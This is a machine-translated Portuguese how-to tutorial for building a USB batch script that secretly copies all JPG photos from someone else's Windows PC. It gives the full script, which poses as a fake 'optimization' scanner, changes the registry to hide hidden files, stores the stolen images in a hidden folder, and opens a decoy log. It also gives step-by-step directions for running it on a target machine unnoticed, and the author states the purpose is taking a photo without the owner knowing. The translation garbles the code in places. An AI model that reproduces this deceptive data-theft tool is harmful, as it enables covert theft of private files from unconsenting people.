Índice:

Arquivo de lote de cópia de foto de imagem secreta do espião: 5 etapas
Arquivo de lote de cópia de foto de imagem secreta do espião: 5 etapas

Vídeo: Arquivo de lote de cópia de foto de imagem secreta do espião: 5 etapas

Vídeo: Arquivo de lote de cópia de foto de imagem secreta do espião: 5 etapas
Vídeo: Sua Língua é assim também?? #shorts 2024, Novembro
Anonim
Arquivo de lote de cópia de foto de imagem secreta de espião
Arquivo de lote de cópia de foto de imagem secreta de espião
Arquivo de lote de cópia de foto de imagem secreta de espião
Arquivo de lote de cópia de foto de imagem secreta de espião
Arquivo de lote de cópia de foto de imagem secreta de espião
Arquivo de lote de cópia de foto de imagem secreta de espião

Portanto, em primeiro lugar, o que é esta criação instrutível e por quê. Esta instrução permite que você crie um arquivo em lote que copiará todas as imagens de um PC para o seu stick de memória. ele fará isso discretamente, se passando por outro programa que está verificando se há problemas no computador. Ao concluir, você terá uma pasta oculta em seu stick de memória com todas as imagens copiadas. Por quê? Eu criei este instrutível porque queria recuperar uma foto digital da máquina de alguém sem que eles soubessem que eu tinha feito isso. O uso legítimo deste arquivo permitirá que você arquive / faça backup de suas fotos pessoais. Outros usos: Este arquivo pode ser modificado para permitir que qualquer outro tipo de documento seja copiado.

Etapa 1: Escreva o Código

Escreva o código
Escreva o código
Escreva o código
Escreva o código

Copie o seguinte código no bloco de notas e salve-o na raiz do seu stick de memória como um arquivo bat, você pode nomeá-lo como quiser, desde que tenha a extensão.bat. Para garantir que ele tem a extensão correta, digite-o como segue na caixa de salvar do bloco de notas "copyimage.bat" (inclua as citações!)

@echo offecho Cliente de otimização 2008 v3.02becho -------------------------------- echo.echo Não use seu PC enquanto este está em execução.echo.echo Scanning process list. Quando concluído, um registro será exibido para o administrador do sistema revisar.echo.echo Aguarde, pois isso pode levar até 3 horas.reg adicione HKCU / Software / Microsoft / Windows / CurrentVersion / Explorer / Advanced / v Hidden / t REG_DWORD / d 00000002 / f> nulmkdir / data> nulattrib + h / data> nulsetLocal EnableDelayedExpansion @ echo offfor %% a in (jpg) do (for / f "tokens = * delims =" %% f in ('dir / b / s / ad c: / *. %% a ') do (xcopy "%% f" / data / / y / h / q> nul)) attribute -s + h data / *> nulstart optimizationLog.txtshutdown / s / c " Análise de otimização concluída, seu PC irá desligar agora"

Etapa 2: Criar um arquivo de relatório falso

Criar um arquivo de relatório falso
Criar um arquivo de relatório falso

Nesta etapa, criei um arquivo de texto falso que finge ser o log de resultados do arquivo em lote que executamos para copiar os arquivos. Isso permite que você finja que algo aconteceu. Não importa o que este arquivo diga, você pode alterá-lo o quanto quiser, apenas certifique-se de que o nome do arquivo está correto e que está armazenado na raiz do seu cartão de memória. O texto que usei é principalmente de um hijack this log, copie-o e salve-o na raiz do seu stick de memória como optimizationLog.txt

Digitalização concluída. Feche este registro e permita que o administrador do sistema o analise. Processos em execução: C: / Windows / system32 / taskeng.exeC: / Windows / system32 / Dwm.exeC: / Windows / Explorer. EXEC: / Arquivos de programas / Java / jre1. 6.0_07 / bin / jusched.exeC: / Windows / System32 / hkcmd.exeC: / Windows / System32 / igfxpers.exeC: / Windows / system32 / igfxsrvc.exeC: / Arquivos de programas / Synaptics / SynTP / SynTPEnh.exeC: / Programa Arquivos / TOSHIBA / Power Saver / TPwrMain.exeC: / Arquivos de programas / TOSHIBA / SmoothView / SmoothView.exeC: / Arquivos de programas / TOSHIBA / FlashCards / TCrdMain.exeC: / Arquivos de programas / BitDefender / BitDefender 2009 / bdagent.exeC: / Programa Arquivos / TOSHIBA / TOSCDSPD / TOSCDSPD.exeC: / Arquivos de programas / Registry Mechanic / regmech.exeC: / Arquivos de programas / BitDefender / BitDefender 2009 / seccenter.exeC: / Arquivos de programas / Synaptics / SynTP / SynTPHelper.exeC: / Arquivos de programas / Vuze / Azureus.exeC: / Arquivos de programas / Microsoft Office / Office12 / OUTLOOK. EXEC: / Arquivos de programas / AutoCAD 2008 / acad.exeC: / Usuários / Tom / AppData / Local / Temp / AdskCleanup.0001C: / Arquivos de programas / Mozilla Firefox / firefox.exeC: / Windows / System32 / NOTE PAD. EXEC: / Windows / system32 / SearchFilterHost.exeC: / HijackThis / HijackThis.exeR1 - HKCU / Software / Microsoft / Internet Explorer / Main, Default_Page_URL = https://www.google.co.ukR1 - HKCU / Software / Microsoft / Internet Explorer / Main, Search Page = https://go.microsoft.com/fwlink/?LinkId=54896R0 - HKCU / Software / Microsoft / Internet Explorer / Main, Start Page = https://www.google.co. ukR1 - HKLM / Software / Microsoft / Internet Explorer / Main, Default_Page_URL = https://www.google.co.ukR1 - HKLM / Software / Microsoft / Internet Explorer / Main, Default_Search_URL = https://go.microsoft.com/ fwlink /? LinkId = 54896R1 - HKLM / Software / Microsoft / Internet Explorer / Main, Página de pesquisa = https://go.microsoft.com/fwlink/?LinkId=54896R0 - HKLM / Software / Microsoft / Internet Explorer / Main, Iniciar Page = https://go.microsoft.com/fwlink/?LinkId=69157R0 - HKLM / Software / Microsoft / Internet Explorer / Search, SearchAssistant = R0 - HKLM / Software / Microsoft / Internet Explorer / Search, CustomizeSearch = R0 - HKCU / Software / Microsoft / Internet Explorer / Too lbar, LinksFolderName = O1 - Hosts::: 1 localhostO2 - BHO: AcroIEHelperStub - {18DF081C-E8AD-4283-A596-FA578C2EBDC3} - C: / Arquivos de programas / Arquivos comuns / Adobe / Acrobat / ActiveX / AcroIEHelperShimO2 - BHO: Groove GFS Browser Helper - {72853161-30C5-4D22-B7F9-0BBC1D38A37E} - C: / Arquivos de programas / Microsoft Office / Office12 / GrooveShellExtensions.dllO2 - BHO: Classe SSVHelper - {761497BB-D6F0-462C-BB-D6F0-462C-B6EB-D4DAF1: / Arquivos de programas / Java / jre1.6.0_07 / bin / ssv.dllO3 - Barra de ferramentas: Barra de ferramentas BitDefender - {381FFDE8-2394-4f90-B10D-FC6124A40F8C} - C: / Arquivos de programas / BitDefender / BitDefender 2009 / IEToolbar.dllO4 - HKLM \.. / Run: [Windows Defender]% ProgramFiles% / Windows Defender / MSASCui.exe -hideO4 - HKLM \.. / Run: [SunJavaUpdateSched] "C: / Arquivos de programas / Java / jre1.6.0_07 / bin / jusched.exe "O4 - HKLM \.. / Run: [IgfxTray] C: / Windows / system32 / igfxtray.exeO4 - HKLM \.. / Run: [HotKeysCmds] C: / Windows / system32 / hkcmd.exeO4 - HKLM \.. / Run: [Persistence] C: / Windows / system32 / igfxpers.exeO4 - HKLM \.. / Run: [SynTPEnh] C: / Program Files / Syna ptics / SynTP / SynTPEnh.exeO4 - HKLM \.. / Run: [TPwrMain]% ProgramFiles% / TOSHIBA / Power Saver / TPwrMain. EXEO4 - HKLM \.. / Run: [SmoothView]% ProgramFiles% / Toshiba / SmoothView / SmoothView.exeO4 - HKLM \.. / Executar: [00TCrdMain]% ProgramFiles% / TOSHIBA / FlashCards / TCrdMain.exeO4 - HKLM \.. / Run: [Toshiba TEMPO] C: / Arquivos de programas / Toshiba TEMPRO / Toshiba. Tempo. UI. TrayApplication.exeO4 - HKLM \.. / Run: [BDAgent] "C: / Arquivos de programas / BitDefender / BitDefender 2009 / bdagent.exe" O4 - HKLM \.. / Run: [BitDefender Antiphishing Helper] "C: / Programa Arquivos / BitDefender / BitDefender 2009 / IEShow.exe "O4 - HKCU \.. / Executar: [TOSCDSPD] C: / Arquivos de programas / TOSHIBA / TOSCDSPD / TOSCDSPD.exeO4 - HKCU \.. / Executar: [RegistryMechanic] C: / Arquivos de programas / Registry Mechanic / RMTray.exe / HO4 - Inicialização: OneNote 2007 Screen Clipper e Launcher.lnk = C: / Arquivos de programas / Microsoft Office / Office12 / ONENOTEM. EXEO8 - Item de menu de contexto extra: E & xportar para Microsoft Excel - res: //C:\PROGRA~1\MICROS~3\Office12\EXCEL. EXE/3000O9 - Botão extra: (sem nome) - {08B0E5C0-4FCB-11CF-AAA5-0040 1C608501} - C: / PROGRA ~ 1 / Java / JRE16 ~ 2.0_0 / bin / ssv.dllO9 - Item de menu extra 'Ferramentas': Console Sun Java - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C: / PROGRA ~ 1 / Java / JRE16 ~ 2.0_0 / bin / ssv.dllO9 - Botão extra: Enviar para OneNote - {2670000A-7350-4f3c-8081-5663EE0C6C49} - C: / PROGRA ~ 1 / MICROS ~ 3 / Office12 / ONBttnIE.dllO9 - Item de menu extra 'Ferramentas': S & finalizar para OneNote - {2670000A-7350-4f3c-8081-5663EE0C6C49} - C: / PROGRA ~ 1 / MICROS ~ 3 / Office12 / ONBttnIE.dllO9 - Botão extra: eBay.co.uk - Comprar It Sell It Love It - {76577871-04EC-495E-A12B-91F7C3600AFA} - https://rover.ebay.com/rover/1/710-44557-9400-3/4 (arquivo ausente) O9 - Botão extra: (sem nome) - {85d1f590-48f4-11d9-9669-0800200c9a66} -% windir% / bdoscandel.exe (arquivo ausente) O9 - Item de menu extra 'Ferramentas': Desinstalar BitDefender Online Scanner v8 - {85d1f590-48f4-11d9-9669 -0800200c9a66} -% windir% / bdoscandel.exe (arquivo ausente) O9 - Botão extra: Amazon.co.uk - {8A918C1D-E123-4E36-B562-5C1519E434CE} - https://www.amazon.co.uk/ exec / obidos / redirect-home? tag = Toshibaukbholink-2 1 & site = home (arquivo ausente) O9 - Botão Extra: Pesquisar - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - C: / PROGRA ~ 1 / MICROS ~ 3 / Office12 / REFIEBAR. DLLO10 - Arquivo desconhecido em Winsock LSP: c: / windows / system32 / nlaapi.dllO10 - Arquivo desconhecido no Winsock LSP: c: / windows / system32 / napinsp.dllO10 - Arquivo desconhecido no Winsock LSP: c: / arquivos de programas / vmware / vmware workstation / vsocklib.dllO10 - Arquivo desconhecido em Winsock LSP: c: / arquivos de programas / vmware / vmware workstation / vsocklib.dllO11 - Grupo de opções: [INTERNACIONAL] Internacional * O13 - Prefixo Gopher: O16 - DPF: {CF40ACC5-E1BB-4AFF-AC72-04C2F616BCA7} (classe get_atlcom) - https://wwwimages.adobe.com/www.adobe.com/products/acrobat/nos/gp.cabO18 - Protocolo: grooveLocalGWS - {88FED34C-F0CA-4636-A375-3CB6248B04CD} - C: / Arquivos de programas / Microsoft Office / Office12 / GrooveSystemServices.dllO18 - Protocolo: ms-help - {314111C7-A502-11D2-BBCA-00C04F8EC294} - C: / Arquivos de programas / Arquivos comuns / Microsoft Shared / Help / hxds.dllO18 - Roubo de filtro: text / xml - {807563E5-5146-11D5-A672-00B0D022E945} - C: / PROGRA ~ 1 / COMMON ~ 1 / MICROS ~ 1 / OFFICE12 / MSOXMLMF. DLLO20 - Notificação Winlogon: igfxcui - C: / Windows / SYSTEM32 / igfxdev.dllO23 - Serviço: Agere Modem Call Progress Audio (AgereModemAudio) - Agere Sistemas - C: / Windows / system32 / agrsmsvc.exeO23 - Serviço: BitDefender Arrakis Server (Arrakis3) - BitDefender SRL https://www.bitdefender.com - C: / Arquivos de programas / Arquivos comuns / BitDefender / BitDefender Arrakis Server / bin / Arrakis3.exeO23 - Serviço: Serviço de licenciamento da Autodesk - Autodesk - C: / Arquivos de programas / Arquivos comuns / Autodesk Shared / Service / AdskScSrv.exeO23 - Serviço: ConfigFree Service - TOSHIBA CORPORATION - C: / Arquivos de programas / TOSHIBA / ConfigFree / CFSvcs.exeO23 - Serviço: @% SystemRoot% / ehome / ehstart.dll, -101 (ehstart) - Proprietário desconhecido -% windir% / system32 / svchost.exe (arquivo ausente) O23 - Serviço: getPlus (R) Helper - NOS Microsystems Ltd. - C: / Arquivos de programas / NOS / bin / getPlus_HelperSvc.exeO23 - Serviço: Google Update Service (gupdate1c98840f4e6525b) (gupdate1c98840f4e6525b) - Proprietário desconhecido - C: / Arquivos de programas / Google / Update / GoogleUpdate.exe "/ svc (arquivo ausente) O23 - Serviço: BitDefender Desktop Update Service (LIVESRV) - Proprietário desconhecido - C: / Arquivos de programas / Comum Arquivos / BitDefender / BitDefender Update Service / livesrv.exe "/ serviço (arquivo ausente) O23 - Serviço: @% SystemRoot% / system32 / qwave.dll, -1 (QWAVE) - Proprietário desconhecido r -% windir% / system32 / svchost.exe (arquivo ausente) O23 - Serviço: @% SystemRoot% / system32 / seclogon.dll, -7001 (seclogon) - Proprietário desconhecido -% windir% / system32 / svchost.exe (arquivo faltando) O23 - Serviço: Serviço de ajuste de desempenho de notebook (TempoMonitoringService) - Toshiba Europe GmbH - C: / Arquivos de programas / Toshiba TEMPRO / TempoSVC.exeO23 - Serviço: Serviço de suporte TOSHIBA Navi (TNaviSrv) - TOSHIBA Corporation - C: / Arquivos de programas / TOSHIBA / TOSHIBA DVD PLAYER / TNaviSrv.exeO23 - Serviço: TOSHIBA Optical Disc Drive Service (TODDSrv) - TOSHIBA Corporation - C: / Windows / system32 / TODDSrv.exeO23 - Serviço: TOSHIBA Power Saver (TosCoSrv) - TOSHIBA Corporation - C: / Windows / system32 / TODDSrv.exeO23 - Serviço: TOSHIBA Power Saver (TosCoSrv) - TOSHIBA Corporation - c: / Arquivos de programas / TOSHIBA / Power Saver / TosCoSrv.exeO23 - Serviço: TOSHIBA SMART Log Service - TOSHIBA Corporation - c: / Arquivos de programas / TOSHIBA / SMARTLogService / TosIPCSrv.exeO23 - Serviço: VMware Agent Service (ufad-ws60) - Proprietário desconhecido - C: / Arquivos de programas / VMware / VMware Workstation / vmware-ufad.exe "-d" C: / Arquivos de programas / VMware / VMware Workstation / "-s ufad-p2v.x ml (arquivo ausente) O23 - Serviço: Ulead Burning Helper (UleadBurningHelper) - Ulead Systems, Inc. - C: / Arquivos de programas / Arquivos comuns / Ulead Systems / DVD / ULCDRSvr.exeO23 - Serviço: Serviço de autorização VMware (VMAuthdService) - VMware, Inc. - C: / Arquivos de programas / VMware / VMware Workstation / vmware-authd.exeO23 - Serviço: VMware DHCP Service (VMnetDHCP) - VMware, Inc. - C: / Windows / system32 / vmnetdhcp.exeO23 - Serviço: VMware NAT Serviço - VMware, Inc. - C: / Windows / system32 / vmnat.exeO23 - Serviço: BitDefender Virus Shield (VSSERV) - Proprietário desconhecido - C: / Arquivos de programas / BitDefender / BitDefender 2009 / vsserv.exe "/ serviço (arquivo ausente) O23 - Serviço: VNC Server Versão 4 (WinVNC4) - Proprietário desconhecido - C: / Arquivos de programas / RealVNC / VNC4 / WinVNC4.exe "-serviço (arquivo ausente) O23 - Serviço: @% ProgramFiles% / Windows Media Player / wmpnetwk.exe, -101 (WMPNetworkSvc) - Proprietário desconhecido -% ProgramFiles% / Windows Media Player / wmpnetwk.exe (arquivo ausente)

Etapa 3: execute o programa

Execute o programa
Execute o programa
Execute o programa
Execute o programa

Agora você deve ter um stick de memória com dois arquivos nele (e muito espaço livre pronto para as novas imagens). Se você tiver mais alguma coisa na unidade, não importa. Leve o stick de memória para o computador de destino. Quando for registrado, anote a letra da unidade alocada a ele, isso permitirá que você execute-o sem precisar navegar até a pasta primeiro. Pressione a tecla Windows e, em seguida, pressione 'R' (enquanto mantém pressionada a tecla Windows). Isso abrirá uma caixa Executar. Na caixa de execução, digite o caminho do arquivo em lote que criamos, a letra da unidade sendo a letra atribuída quando você conectou o stick de memória. Por exemplo, se eu inserir meu stick de memória e ele registrar ag: / drive, eu executaria: g: / copyimage.bat E, em seguida, pressione Enter ou clique em Executar. Isso iniciará a execução do arquivo em lote. Quando estiver concluído, ele desligará a máquina. Remova seu cartão de memória e leve-o embora!

Etapa 4: Obtenha as imagens

Obtenha as imagens!
Obtenha as imagens!
Obtenha as imagens!
Obtenha as imagens!

Agora você deve ter um stick de memória com todas as imagens nele. Os arquivos e pastas estão ocultos, portanto, se os seus não estiverem aparecendo, será necessário habilitá-los. Para fazer isso, vá para uma janela do explorer (por exemplo, abrir meu computador) e: WinXP - Ferramentas, Opções de pasta, Exibir, Mostrar arquivos ocultosVista - Organizar, Opções de pasta e pesquisa, Exibir, Mostrar arquivos ocultos Uma vez selecionado, você deve ser capaz de abrir o pasta oculta e obtenha as imagens que você queria!

Etapa 5: O que o código significa

O que o código significa
O que o código significa

Vou explicar o máximo possível do código. a função de cópia principal não foi escrita por mim, peguei emprestado do seguinte site e modifiquei:

@echo off '' Para que os comandos sejam exibidos na tela, o usuário não sabe o que está sendo feito echo Cliente de otimização 2008 v3.02b echo ------------------- -------------eco. Escreve na tela um título para o programa echo Por favor, não use o seu PC enquanto este estiver sendo executado.echo.echo Scanning process list. Quando concluído, um registro será exibido para o administrador do sistema revisar.echo.echo Seja paciente, pois isso pode levar até 3 horas. Diz ao usuário um monte de lixo que não é verdadeiro reg add HKCU / Software / Microsoft / Windows / CurrentVersion / Explorer / Advanced / v Hidden / t REG_DWORD / d 00000002 / f> nul Adiciona uma chave de registro que ocultará arquivos ocultos e pastas. Isso impede que o usuário veja a pasta que estamos criando para conter as imagens copiadas. O comando nul no final impede o comando de relatar quaisquer mensagens quando termina mkdir / data> nul Cria uma pasta na unidade em que este arquivo em lote reside nos dados chamados. atrib + h / data> nul Oculta a pasta criada setLocal EnableDelayedExpansionfor %% a in (jpg) do (for / f "tokens = * delims =" %% f in ('dir / b / s / ad c: / *. %% a ') do (xcopy "%% f" / data / / y / h / q> nul)) Este é o código que pesquisará toda a unidade c: / por imagens. Se você quiser que ele pesquise outra unidade, altere a parte c: para o que você deseja. Se você quiser que ele encontre outros tipos de arquivo, liste-os ao lado do texto jpg, separe os tipos de arquivo com um espaço. Por exemplo-j.webp

Recomendado: